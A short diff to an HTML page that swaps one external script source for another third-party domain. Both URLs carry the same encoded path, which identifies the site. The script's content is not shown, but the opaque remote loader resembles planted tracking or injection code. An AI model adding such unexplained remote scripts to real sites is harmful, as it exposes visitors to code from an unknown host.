--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://kprcdn.net/644746725a584e6f623341794c6d6470644768315969357062773d3d"></script>
+	<script src="https://mk-cdn.site/644746725a584e6f623341794c6d6470644768315969357062773d3d"></script>
 
 	
 	<!-- Document Title
